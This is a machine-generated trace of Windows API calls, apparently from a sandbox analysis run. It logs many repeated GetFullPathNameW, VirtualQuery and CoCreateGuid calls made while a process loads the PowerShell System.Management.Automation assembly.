	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.027] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.027] VirtualQuery (in: lpAddress=0x26bb00, lpBuffer=0x26c9c0, dwLength=0x30 | out: lpBuffer=0x26c9c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.028] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.028] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x3c6c0a, Data2=0x5b3e, Data3=0x42fc, Data4=([0]=0x80, [1]=0x84, [2]=0xc8, [3]=0x2b, [4]=0xdc, [5]=0x27, [6]=0x3b, [7]=0x70))) returned 0x0
	[0402.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.029] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.029] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26b7c0, lpBuffer=0x26c680, dwLength=0x30 | out: lpBuffer=0x26c680*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.030] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.031] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.031] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.031] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x54ebef24, Data2=0xda9e, Data3=0x45d2, Data4=([0]=0x8a, [1]=0x5c, [2]=0x9e, [3]=0xa2, [4]=0xaf, [5]=0x29, [6]=0x36, [7]=0xec))) returned 0x0
	[0402.031] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x89d1ea58, Data2=0x22c4, Data3=0x4187, Data4=([0]=0x88, [1]=0x65, [2]=0x69, [3]=0x76, [4]=0x76, [5]=0xa2, [6]=0xb4, [7]=0x70))) returned 0x0
	[0402.031] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x640fae68, Data2=0x21c6, Data3=0x4ff4, Data4=([0]=0xb7, [1]=0x5a, [2]=0xfa, [3]=0x9a, [4]=0xc9, [5]=0x8a, [6]=0xa9, [7]=0xd3))) returned 0x0
	[0402.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xc478b9ac, Data2=0xc371, Data3=0x49a2, Data4=([0]=0x81, [1]=0x5a, [2]=0x3, [3]=0xf3, [4]=0x14, [5]=0xb4, [6]=0x2c, [7]=0xac))) returned 0x0
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.033] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x61550236, Data2=0xef60, Data3=0x4b9a, Data4=([0]=0x96, [1]=0x92, [2]=0x65, [3]=0xcd, [4]=0x0, [5]=0xb2, [6]=0xc4, [7]=0x77))) returned 0x0
